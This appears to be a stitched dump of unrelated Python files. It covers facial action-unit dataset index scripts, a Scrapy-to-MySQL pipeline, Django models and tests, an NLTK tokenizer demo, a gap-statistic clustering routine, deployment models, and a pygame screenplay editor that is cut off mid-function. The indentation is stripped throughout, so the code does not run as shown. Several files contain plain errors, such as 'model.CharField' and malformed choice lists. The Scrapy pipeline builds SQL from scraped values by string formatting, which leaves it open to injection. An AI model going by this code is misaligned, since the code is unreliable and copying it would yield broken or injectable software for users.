with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
for line in validate_lines:
file_obj.write("{}\n".format(line))
file_obj.flush()
with open("{}/full_pretrain.txt".format(folder_path), "w") as file_obj:
for line in pretrained_full:
file_obj.write("{}\n".format(line))
file_obj.flush()
if partition_path is not None:
trn_subject_name = []
validate_subject_name = []
trn_subject_file_path = partition_path["trn"]
valid_subject_file_path = partition_path["valid"]
with open(trn_subject_file_path, "r") as file_obj:
for line in file_obj:
line = line.strip()
if line:
trn_subject_name.append(line)
with open(valid_subject_file_path, "r") as file_obj:
for line in file_obj:
line = line.strip()
if line:
validate_subject_name.append(line)
folder_path = idx_folder_path + "/official_partition"
if not os.path.exists(folder_path):
os.makedirs(folder_path)
with open("{}/id_train.txt".format(folder_path), "w") as file_obj:
for subject_name in trn_subject_name:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, video_info["database"])
file_obj.write("{}\n".format(line))
file_obj.flush()
with open("{}/id_validate.txt".format(folder_path), "w") as file_obj:
for subject_name in validate_subject_name:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, video_info["database"])
file_obj.write("{}\n".format(line))
file_obj.flush()
return BP4D_lines
def gen_DISFA_subject_id_file(idx_folder_path, kfold=None, partition_file_path=None):
DISFA_base_dir = config.DATA_PATH["DISFA"]
label_file_dir = DISFA_base_dir + "/ActionUnit_Labels/"
subject_video = defaultdict(dict) # key is subject id
orientations = ["Left", "Right"]
for video_name in os.listdir(label_file_dir):
frame_label = {}
for label_file_name in os.listdir(label_file_dir+os.sep+video_name):
AU = label_file_name[label_file_name.index("au") + 2: label_file_name.rindex(".")]
with open(label_file_dir+os.sep+video_name+os.sep+label_file_name, "r") as file_obj:
for line in file_obj:
line = line.strip()
if line:
frame, AU_intensity = line.split(",")
AU_intensity = int(AU_intensity)
if frame not in frame_label:
frame_label[frame] = set()
if AU_intensity >= 1: # FIXME 是否需要改为>= 3?
frame_label[frame].add(AU)
for orientation in orientations:
img_folder = DISFA_base_dir + "/Img_{}Camera".format(orientation)
for frame, AU_set in sorted(frame_label.items(), key=lambda e:int(e[0])):
if orientation not in subject_video[video_name]:
subject_video[video_name][orientation] = []
img_file_path = img_folder + "/" + video_name + "/" + frame + ".jpg"
if os.path.exists(img_file_path):
subject_video[video_name][orientation].append({"img_path":img_file_path, "AU_label":AU_set,
"database":"DISFA"})
subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
if kfold is not None:
kf = KFold(n_splits=kfold, shuffle=True)
i = 0
for train_index, test_index in kf.split(subject_name_ls):
i += 1
train_name_array = subject_name_ls[train_index]
test_name_array = subject_name_ls[test_index]
folder_path = "{0}/{1}_fold".format(idx_folder_path, kfold)
print(folder_path)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
for video_name in train_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
file_obj.flush()
with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
for video_name in test_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
file_obj.flush()
with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
for video_name in test_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
file_obj.flush()
if __name__ == "__main__":
from dataset_toolkit.adaptive_AU_config import adaptive_AU_database
#
# adaptive_AU_database("BP4D")
# partition = {"trn":"/home/machen/dataset/BP4D/idx/trn_partition.txt",
# "valid":"/home/machen/dataset/BP4D/idx/validate_partition.txt"}
# gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=10, validation_size=1000)
adaptive_AU_database("DISFA")
# single_AU_RCNN_BP4D_subject_id_file("{0}/{1}".format(config.ROOT_PATH + os.sep+"/BP4D/", "idx"), kfold=3)
gen_DISFA_subject_id_file("{0}/{1}".format(config.ROOT_PATH + os.sep+"/DISFA_1/", "idx"), kfold=3)
# gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=10)
# gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=3)
# print("done") |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
from twisted.enterprise import adbapi
from hashlib import md5
import MySQLdb.cursors
import logging
log = logging.getLogger("dianping")
formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(message)s', '%a, %d %b %Y %H:%M:%S',)
file_handler = logging.FileHandler("dianping.log")
file_handler.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
stream_handler.setFormatter(formatter)
log.addHandler(file_handler)
log.addHandler(stream_handler)
class TutorialPipeline(object):
def process_item(self, item, spider):
return item
class JsonWriterPipeline(object):
def __init__(self):
self.file = open('items.jl', 'wb')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line)
return item
def close_spider(self, spider):
self.file.close()
class MySQLStorePipeline(object):
def __init__(self, dbpool):
self.dbpool = dbpool
@classmethod
def from_crawler(cls, crawler):
dbargs = dict(
host=crawler.settings.get('MYSQL_HOST'),
db=crawler.settings.get('MYSQL_DBNAME'),
user=crawler.settings.get('MYSQL_USER'),
passwd=crawler.settings.get('MYSQL_PASSWD'),
charset='utf8',
cursorclass=MySQLdb.cursors.DictCursor,
use_unicode=True,
)
dbpool = adbapi.ConnectionPool('MySQLdb', **dbargs)
return cls(dbpool)
def process_item(self, item, spider):
d = self.dbpool.runInteraction(self._insert, item, spider)
d.addErrback(self.__handle_error, item, spider)
return item
def _insert(self, conn, item, spider):
md5id = self._get_md5id(item)
conn.execute("select 1 from dianping where md5id = '%s'" % md5id)
ret = conn.fetchone()
if ret:
log.warn("Item already stored in db: %s" % item)
else:
conn.execute("insert into dianping(md5id, shop_name, shop_address, "
"shop_region, shop_city, shop_latitude, shop_longitude) "
"values ('%s', '%s', '%s', '%s', '%s', '%s', '%s')"
% (md5id, item["shop_name"], item["shop_address"], item["shop_region"],
item["shop_city"], item["shop_latitude"], item["shop_longitude"]))
log.info("Item stored in db: %s" % item)
def __handle_error(self, e, item, spider):
log.error(e)
def _get_md5id(self, item):
return md5(" ".join([item["shop_name"], item["shop_latitude"],
item["shop_longitude"]]).encode("utf8")).hexdigest()
|
from terminaltables import AsciiTable
from colorclass import Color
def colored_status(status, text):
if status == u'passed':
return Color('{autogreen}%s{/autogreen}' % text)
elif status == u'skipped':
return Color('{autocyan}%s{/autocyan}' % text)
else:
return Color('{autored}%s{/autored}' % text)
def two_decimals(number):
return "{0:.2f}".format(number)
def print_overview_features(features):
table_data = [['Feature', 'Scenario', 'Duration']]
for feature in features:
for scenario in feature.scenarios:
table_data.append(
[feature.filename,
colored_status(scenario.status, scenario.name),
two_decimals(scenario.duration)])
table = AsciiTable(table_data)
print(table.table)
|
"""
wraper api for native os
"""
import os
from mamp_cli.base import ApiBase
class OsApi(ApiBase):
def __init__(self, config: Config):
pass
|
# Generated by Django 2.1.7 on 2019-03-30 22:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0027_auto_20190329_0719'),
]
operations = [
migrations.AlterModelOptions(
name='subcategory',
options={'ordering': ['class_field_id', 'name'], 'verbose_name_plural': 'subcategories'},
),
migrations.AlterModelOptions(
name='transactionclass',
options={'verbose_name_plural': 'transaction classes'},
),
]
|
from django.db import models
# Create your models here.
class orderDetails_db(models.Model):
timestamp = models.DateTimeField(auto_now=True)
rollNo = models.IntegerField();
itemName = models.CharField(max_length = 100)
company = model.CharField(max_length=1, choices=[
'zomato':'Zomato',
'swiggy' : 'Swiggy',
'other' : 'other',
])
deliveryGuyContact = model.IntegerField();
def __str__(self):
return self.rollNo
|
# a easy String test
def findComplement(num):
"""
:type num: int
:rtype: int
"""
bit_str = bin(num)[2:]
result = []
for i in bit_str:
if i == '0':
result.append('1')
else:
result.append('0')
''.join(result)
return int(''.join(result), 2)
if __name__ == '__main__':
print(findComplement(5)) |
# Natural Language Processing With Python and NLTK p.1 Tokenizing words and Sentences
# import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
# tokenizing - word tokenizer... sentence tokenizer = way of splitting strings
# lexicon and corporas
# corpora - body of text. ex: medical journal, presidential speeches, English language
# lexicon - words and their means
# investor-speak... regular english-speak
# investor speak 'bull' = someone who is positive about the market
# english speak 'bull' = scary animal you don't want running @ you
example_text = "Hello Mr. Smith, how are you doing today? The weather is great and Python is awesome. The sky is pinkish-blue. You should not eat cardboard."
##print(sent_tokenize(example_text))
##
##print(word_tokenize(example_text))
for i in word_tokenize(example_text):
print(i)
|
### Gap Statistics Function
### Input: X = read_csv()
### Outputs: ks, Wks, Wkbs, sk
### Wks and Wkbs are logarithmic
from numpy import genfromtxt
import numpy as np
import random
from numpy import zeros
def bounding_box(X):
xmin, xmax = min(X,key=lambda a:a[0])[0], max(X,key=lambda a:a[0])[0]
ymin, ymax = min(X,key=lambda a:a[1])[1], max(X,key=lambda a:a[1])[1]
return (xmin,xmax), (ymin,ymax)
def has_converged(mu, oldmu):
return (set([tuple(a) for a in mu]) == set([tuple(a) for a in oldmu]))
def cluster_points(X, mu):
clusters = {}
for x in X:
bestmukey = min([(i[0], np.linalg.norm(x-mu[i[0]])) \
for i in enumerate(mu)], key=lambda t:t[1])[0]
try:
clusters[bestmukey].append(x)
except KeyError:
clusters[bestmukey] = [x]
return clusters
def find_centers(X, K):
# Initialize to K random centers
oldmu = random.sample(X, K)
mu = random.sample(X, K)
while not has_converged(mu, oldmu):
oldmu = mu
# Assign all points in X to clusters
clusters = cluster_points(X, mu)
# Reevaluate centers
mu = reevaluate_centers(oldmu, clusters)
return(mu, clusters)
def reevaluate_centers(mu, clusters):
newmu = []
keys = sorted(clusters.keys())
for k in keys:
newmu.append(np.mean(clusters[k], axis = 0))
return newmu
def Wk(mu, clusters):
K = len(mu)
return sum([np.linalg.norm(mu[i]-c)**2/(2*len(c)) \
for i in range(K) for c in clusters[i]])
def gap_statistic(X):
(xmin,xmax), (ymin,ymax) = bounding_box(X)
# Dispersion for real distribution
ks = range(1,10)
Wks = zeros(len(ks))
Wkbs = zeros(len(ks))
sk = zeros(len(ks))
for indk, k in enumerate(ks):
mu, clusters = find_centers(X,k)
Wks[indk] = np.log(Wk(mu, clusters))
# Create B reference datasets
B = 10
BWkbs = zeros(B)
for i in range(B):
Xb = []
for n in range(len(X)):
Xb.append([random.uniform(xmin,xmax),
random.uniform(ymin,ymax)])
Xb = np.array(Xb)
mu, clusters = find_centers(Xb,k)
BWkbs[i] = np.log(Wk(mu, clusters))
Wkbs[indk] = sum(BWkbs)/B
sk[indk] = np.sqrt(sum((BWkbs-Wkbs[indk])**2)/B)
sk = sk*np.sqrt(1+1/B)
return(ks, Wks, Wkbs, sk)
|
from django.test import TestCase
from django.contrib.auth.models import User
from .models import User as UserModel, AccountDetail, Transaction
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
from faker import Faker
class ModelTestCase(TestCase):
"""Class defines test suite for our model"""
def setUp(self):
self.fake = Faker()
user = User.objects.create(username=self.fake.user_name())
self.first_name = self.fake.first_name()
self.last_name = self.fake.last_name()
self.email = self.fake.email()
self.user_data = UserModel(
owner=user,
first_name=self.first_name,
last_name=self.last_name,
email=self.email,
)
def test_model_can_create_user_table_in_db(self):
old_count = UserModel.objects.count()
self.user_data.save()
new_count = UserModel.objects.count()
self.assertNotEqual(old_count, new_count)
def test_model_can_create_account_details_table(self):
pass
def test_model_can_create__table_in_db(self):
pass
class ServicesTestCase(TestCase):
""" Test buiseness logic here """
pass
class ViewTestCase(TestCase):
def setUp(self):
self.fake = Faker()
user = User.objects.create(username=self.fake.user_name())
self.client = APIClient()
self.client.force_authenticate(user=user)
self.user_data = {
'owner':user.id,
'first_name': self.fake.first_name(),
'last_name': self.fake.last_name(),
'email': self.fake.email(),
}
self.response = self.client.post(
reverse('createuser'),
self.user_data,
format = "json"
)
def test_api_can_create_a_user(self):
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_authorization_is_enforced(self):
a_client = APIClient()
a_response = a_client.get(
'profile',
kwargs={'pk':5},
format="json",
)
self.assertEqual(a_response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_api_can_get_user_details(self):
user = UserModel.objects.get(id=5)
response = self.client.get(
'profile',
kwargs={'pk':user.id},
format="json",
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertContains(response, user)
def test_api_can_update_user_email(self):
user = UserModel.objects.get()
change_email = {'email':'hello@test.com'}
response = self.client.put(
reverse('profile', kwargs={'pk':user.id}),
change_email,
format="json",
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_api_can_delete_user(self):
pass
|
from django.db import models
class Rsa(models.Model):
""" 秘钥 """
status_choices = (
(1, '启用'),
(2, '停用'),
)
status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices)
user = models.CharField(verbose_name='用户', max_length=32, default='root')
private_key = models.TextField(verbose_name='私钥')
class Server(models.Model):
""" 主机表
例如:公司所有的主机信息
"""
hostname = models.CharField(verbose_name='主机名', max_length=32)
def __str__(self):
return self.hostname
class Project(models.Model):
""" 项目 """
title = models.CharField(verbose_name='项目名', max_length=32)
repo = models.CharField(verbose_name='git仓库地址', max_length=128) # ['http', 'https', 'ftp', 'ftps']
def __str__(self):
return self.title
class ProjectEnv(models.Model):
""" 项目环境 """
project = models.ForeignKey(verbose_name='项目', to='Project')
env_choices = (
('test', '测试'),
('prod', '正式')
)
env = models.CharField(verbose_name='环境', choices=env_choices, max_length=32)
path = models.CharField(verbose_name='线上部署路径', max_length=128)
servers = models.ManyToManyField(verbose_name='服务器', to='Server')
def __str__(self):
return "%s(%s)" % (self.project.title, self.get_env_display())
class DeployTask(models.Model):
summary = models.CharField(verbose_name='描述', max_length=64)
uid = models.CharField(verbose_name='任务ID', max_length=64, help_text="任务ID格式为:项目-版本-时间,例如 cmdb-v1-201911012359.zip")
status_choices = (
(1, '待发布'),
(2, '发布中'),
(3, '成功'),
(4, '失败'),
)
status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
env = models.ForeignKey(verbose_name='环境', to='ProjectEnv')
# 正式发布用tag
tag = models.CharField(verbose_name='版本', max_length=32, null=True, blank=True)
# 测试发布用branch 、commit
branch = models.CharField(verbose_name='分支', max_length=32, null=True, blank=True)
commit = models.CharField(verbose_name='提交记录', max_length=40, null=True, blank=True)
deploy_type_choices = (
(1, '全量主机发布'),
(2, '自定义主机发布'),
)
deploy_type = models.PositiveSmallIntegerField(verbose_name='发布类型', choices=deploy_type_choices, default=1)
# 查询
"""
xx = models.ManyToManyField(verbose_name='自定义主机',
to='Server',
through='DeployServer',
through_fields=('deploy', 'server'))
"""
before_download_script = models.TextField(verbose_name='下载前脚本', null=True, blank=True)
after_download_script = models.TextField(verbose_name='下载后脚本', null=True, blank=True)
before_deploy_script = models.TextField(verbose_name='发布前脚本', null=True, blank=True)
after_deploy_script = models.TextField(verbose_name='发布后脚本', null=True, blank=True)
class HookScript(models.Model):
"""
钩子脚本
"""
title = models.CharField(verbose_name='标题', max_length=32)
hook_type_choices = (
(2, '下载前'),
(4, '下载后'),
(7, '发布前'),
(9, '发布后'),
)
hook_type = models.IntegerField(verbose_name='钩子类型', choices=hook_type_choices)
script = models.TextField(verbose_name='脚本内容')
class DeployServer(models.Model):
"""
上线记录
"""
deploy = models.ForeignKey(verbose_name='发布任务', to='DeployTask')
server = models.ForeignKey(verbose_name='服务器', to='Server')
status_choices = (
(1, '待发布'),
(2, '发布中'),
(3, '失败'),
(4, '成功'),
)
status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
class Diagram(models.Model):
"""发布图标"""
task = models.ForeignKey(verbose_name='发布任务', to='DeployTask')
text = models.CharField(verbose_name='文本', max_length=32)
status_choices = (
('gray', '待执行'),
('green', '成功'),
('red', '失败'),
)
status = models.CharField(verbose_name='状态', max_length=32, choices=status_choices, default='gray')
parent = models.ForeignKey(verbose_name='父节点', to='self', null=True, blank=True)
deploy_record = models.ForeignKey(verbose_name='服务器发布记录', to='DeployServer', null=True, blank=True)
log = models.TextField(verbose_name='日志', null=True, blank=True)
|
import time
import os
import yaml
import pygame
from pygame.locals import *
import owr_screenplay
import owr_behavior
def HandleScreenplayViewportSelectInput(self, game):
"""Extending out Core's input handler"""
# If they hit ESC, clear selection
if self.input.IsKeyDown(K_ESCAPE, once=True):
game.ui_select_viewport = None
print 'Quit Select Viewport'
rect = pygame.Rect([0, 0], game.core.data['window']['viewport size'])
if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
print 'Viewport Select: %s: %s' % (str(self.input.mousePos), game.ui_select_viewport)
# If we are selection position for a Actor's data keys
if game.ui_select_viewport['action'] == 'select position':
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
actor = game.ui_select_viewport['data'][0]
actor_data = current_state['actors'][actor]
key = game.ui_select_viewport['data'][1]
#TODO(g): Convert to World Coordinates, not just Screen Coords, this is WRONG!
actor_data[key] = list(self.input.mousePos)
# Clear this selection - Leads to double hitting ESC which cancels stuff
game.ui_select_viewport = None
# Regenerate Timeline
owr_screenplay.RegenerateTimeline(game)
print 'Selected Actor Pos: %s: %s: %s' % (actor, key, actor_data[key])
# Else, if a Goal Key that needs Viewport Select,
elif game.ui_select_viewport['action'] in ('add goal key', 'edit goal key'):
# Change the Actor data
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
actor_data = current_state['actors'][game.ui_select_viewport['actor']]
# Set the goal key value to the Viewport Pos
actor_data['goal'][game.ui_select_viewport['goal_number']][game.ui_select_viewport['key']] = list(self.input.mousePos)
# If this is a primary key, set all the default keys if they dont already exist
if game.ui_select_viewport['key'] in owr_behavior.GOAL_KEYS:
if game.ui_select_viewport['key'] in owr_behavior.GOAL_DEFAULTS:
for (goal_key, default_value) in owr_behavior.GOAL_DEFAULTS[game.ui_select_viewport['key']].items():
# If we dont already have this goal key, set the default value
if goal_key not in actor_data['goal'][game.ui_select_viewport['goal_number']]:
actor_data['goal'][game.ui_select_viewport['goal_number']][goal_key] = default_value
# Clear the Viewport and popup UI - We did everything here
game.ui_select_viewport = None
game.ui_popup_data = None
# Regenerate Timeline
owr_screenplay.RegenerateTimeline(game)
elif game.ui_select_viewport['action'] == 'position camera':
# # Render any Camera Rects, if we arent using the camera view
# if state['cameras'] and not game.use_camera_view:
# camera = state['cameras'][0]
# Populate first position
if game.ui_select_viewport['first'] == None:
game.ui_select_viewport['first'] = list(self.input.mousePos)
# Populate second position and save
elif game.ui_select_viewport['second'] == None:
game.ui_select_viewport['second'] = list(self.input.mousePos)
# Determine the rect position and size
def HandleScreenplayPopupInput(self, game):
"""Extending out Core's input handler"""
# If they hit ESC, clear the popup
if self.input.IsKeyDown(K_ESCAPE, once=True):
game.ui_popup_data = None
print 'Quit Select Viewport'
# If we have Input Targets (UI)
if hasattr(game, 'input_targets'):
for input_target in game.input_targets:
rect = pygame.Rect(input_target['pos'], input_target['size'])
if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
print '%s: %s' % (input_target['action'], input_target['data'])
# Else, if we are trying to edit a goal key
if input_target['action'] == 'add goal key:select:key':
game.ui_popup_data['key'] = input_target['data']
game.ui_popup_data['prompt'] = 'Enter Key Value: %s' % game.ui_popup_data['key']
def HandleScreenplayInput(self, game):
"""Extending out Core's input handler"""
MOVE_ONCE = False
# Clear any hover over, as we dont know of any so far
game.ui_hover_over_button = None
# If we have Input Targets (UI)
if hasattr(game, 'input_targets'):
for input_target in game.input_targets:
rect = pygame.Rect(input_target['pos'], input_target['size'])
# Hovered over, but not clicked
if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] != self.input.ticks:
print 'Hover over: %s' % input_target['name']
game.ui_hover_over_button = input_target['name']
# Else, if clicked button
elif rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
print '%s: %s' % (input_target['action'], input_target['data'])
# If we are selecting an actor, toggle
if input_target['action'] == 'select actor':
# If we dont have this yet, add it
if input_target['name'] not in game.ui_selected_actors:
game.ui_selected_actors.append(input_target['name'])
else:
game.ui_selected_actors.remove(input_target['name'])
# Else, if we are trying to delete an actor
elif input_target['action'] == 'delete actor':
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
del current_state['actors'][input_target['data']]
# Regenerate Timeline
owr_screenplay.RegenerateTimeline(game)
# Else, if we are trying to delete a goal key
elif input_target['action'] == 'delete goal key':
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
actor = input_target['data'][0]
goal_number = input_target['data'][1]
goal_key = input_target['data'][2]
del current_state['actors'][actor]['goal'][goal_number][goal_key]
# Regenerate Timeline
owr_screenplay.RegenerateTimeline(game)
# Else, if we are trying to delete a goal
elif input_target['action'] == 'delete goal':
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
actor = input_target['data'][0]
goal_number = input_target['data'][1]
del current_state['actors'][actor]['goal'][goal_number]
# Regenerate Timeline
owr_screenplay.RegenerateTimeline(game)
# Else, if we are trying to add a goal key
elif input_target['action'] == 'add goal key':
# Clear the string, so we can get it
game.core.input.ClearAutoString()
# Create UI Popup information, to create a popup input display
actor = input_target['data'][0]
goal_number = input_target['data'][1]
game.ui_popup_data = {'action':input_target['action'], 'prompt':'Select Goal:', 'actor':actor, 'goal_number':goal_number, 'key':None, 'value':None}
# Else, if we are trying to add a goal
elif input_target['action'] == 'add goal':
# Clear the string, so we can get it
game.core.input.ClearAutoString()
# Add a new goal - No need to RegenerateTime() because it doesnt do anything yet
current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
actor = input_target['data']
# Insert empty goal dict
current_state['actors'][actor]['goal'].append({})
# Else, if we are trying to edit a goal key
elif input_target['action'] == 'edit goal key':
# Clear the string, so we can get it
game.core.input.ClearAutoString()
# Set the auto-string to the current value
print 'Setting initial string: %s' % str(input_target['data'][3])
game.core.input.autoKeyString = str(input_target['data'][3])
prompt = 'Enter Key Value: %s' % input_target['data'][2]
# Create UI Popup information, to create a popup input display
game.ui_popup_data = {'action':input_target['action'], 'prompt':prompt, 'actor':input_target['data'][0], 'goal_number':input_target['data'][1], 'key':input_target['data'][2], 'value':None}
# # Regenerate Timeline
# owr_screenplay.RegenerateTimeline(game)
# Else, if we are trying to edit a goal key
elif input_target['action'] == 'select position':
print 'Select Viewport Position'
# Set the UI Select Viewport data, so that this input mode enages
game.ui_select_viewport = input_target
# If there is a player playing, let them process the input
if game.player:
input_text = game.player.ProcessInput(self.input)
self.input_text = input_text #TODO(g): This is in the wrong place: startup code
#Log('Input: %s' % input_text)
# Get information
if self.input.IsKeyDown(K_i, once=True):
#Log('Game:\n%s' % self.game)
Log('Player:\n%s' % self.game.player)
# If no Shift or Ctrl is being pressed
if not ((self.input.IsKeyDown(K_LSHIFT) or self.input.IsKeyDown(K_RSHIFT)) or self.input.IsKeyDown(K_LCTRL)):
# If they hit 1
if self.input.IsKeyDown(K_1, once=True):
game.use_camera_view = not game.use_camera_view
print 'Using Camera View: %s' % game.use_camera_view
# If they hit LEFT
if self.input.IsKeyDown(K_LEFT):
game.time_elapsed -= 0.2
if game.time_elapsed < 0.0:
game.time_elapsed = 0.0
print 'BACK: %0.1f seconds since start' % (game.time_elapsed)
# If they hit RIGHT
if self.input.IsKeyDown(K_RIGHT):
game.time_elapsed += 0.2
#TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
#TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
if game.time_elapsed >= 300.0:
game.time_elapsed = 299.9
print 'FWRD: %0.1f seconds since start' % (game.time_elapsed)
if self.input.IsKeyDown(K_UP):
game.time_elapsed -= 2.0
if game.time_elapsed < 0.0:
game.time_elapsed = 0.0
print 'BACK: %0.1f seconds since start' % (game.time_elapsed)
if self.input.IsKeyDown(K_DOWN):
game.time_elapsed += 2.0
if game.time_elapsed >= 300.0:
game.time_elapsed = 299.9
print 'FWRD: %0.1f seconds since start' % (game.time_elapsed)
# Select Next Actor
if self.input.IsKeyDown(K_TAB, once=True):
selected_actor = owr_screenplay.SelectNextActor(game)
print 'TAB: Selected Actor: %s' % (selected_actor)
# Adjust how much to skip between Future/Past frames
if self.input.IsKeyDown(K_LEFTBRACKET):
game.future_past_skip -= 1
if game.future_past_skip < 1:
game.future_past_skip = 1
print 'Skip adjusted: %s' % game.future_past_skip
if self.input.IsKeyDown(K_RIGHTBRACKET):
game.future_past_skip += 1
if game.future_past_skip > 50:
game.future_past_skip = 50
print 'Skip adjusted: %s' % game.future_past_skip
# If only Left Shift is being held down
if (self.input.IsKeyDown(K_LSHIFT) or self.input.IsKeyDown(K_RSHIFT)) and not self.input.IsKeyDown(K_LCTRL):
# Select Previous Actor
if self.input.IsKeyDown(K_TAB, once=True):
selected_actor = owr_screenplay.SelectNextActor(game, reverse=True)
print 'TAB: Selected Actor: %s' % (selected_actor)
# If they hit LEFT
if self.input.IsKeyDown(K_LEFT, once=True):
previous_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed, get_previous_state=True)
game.time_elapsed = previous_state['at']
print 'PREVIOUS CHANGE POINT: %0.1f seconds since start' % (game.time_elapsed)
# If they hit RIGHT
if self.input.IsKeyDown(K_RIGHT, once=True):
next_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed, get_next_state=True)
game.time_elapsed = next_state['at']
print 'NEXT CHANGE POINT: %0.1f seconds since start' % (game.time_elapsed)
# If they hit RIGHT - Move only 1 frame worth of time
if self.input.IsKeyDown(K_DOWN, once=True):
game.time_elapsed += (1.0 / float(owr_screenplay.FRAMES_PER_SECOND))
#TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
#TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
if game.time_elapsed >= 300.0:
game.time_elapsed = 299.9
print 'FWRD STEP: %0.1f seconds since start' % (game.time_elapsed)
# If they hit LEFT - Move only 1 frame worth of time
if self.input.IsKeyDown(K_UP, once=True):
game.time_elapsed -= (1.0 / float(owr_screenplay.FRAMES_PER_SECOND))
#TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
#TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
if game.time_elapsed < 0.0:
game.time_elapsed = 0.0
print 'REVERSE STEP: %0.1f seconds since start' % (game.time_elapsed)
# Adjust how much to skip between Future frames
if self.input.IsKeyDown(K_LEFTBRACKET, once=True):
game.future_frames -= 1
if game.future_frames < 0:
game.future_frames = 0
print 'Future Frames adjusted: %s' % game.future_frames
if self.input.IsKeyDown(K_RIGHTBRACKET, once=True):
game.future_frames += 1
if game.future_frames > 20:
game.future_frames = 20
print 'Future Frames adjusted: %s' % game.future_frames
# If only Left CTRL to being held down
if self.input.IsKeyDown(K_LCTRL) and not self.input.IsKeyDown(K_LSHIFT):
# Adjust how much to skip between Past frames
if self.input.IsKeyDown(K_LEFTBRACKET, once=True):
game.past_frames -= 1
if game.past_frames < 0:
game.past_frames = 0
print 'Past Frames adjusted: %s' % game.past_frames
if self.input.IsKeyDown(K_RIGHTBRACKET, once=True):
game.past_frames += 1
if game.past_frames > 20:
game.past_frames = 20
print 'Past Frames adjusted: %s' % game.past_frames
# If we're told to Save the screenplay
if self.input.IsKeyDown(K_s, once=True):
owr_screenplay.SaveScreenplay(game)
# If we're told to Save the screenplay
if self.input.IsKeyDown(K_m, once=True):
#owr_screenplay.SaveScreenplay(game)
game.ui_select_viewport = {'action':'position camera', 'first':None, 'second':None}
# Add an Actor
if self.input.IsKeyDown(K_a, once=True):
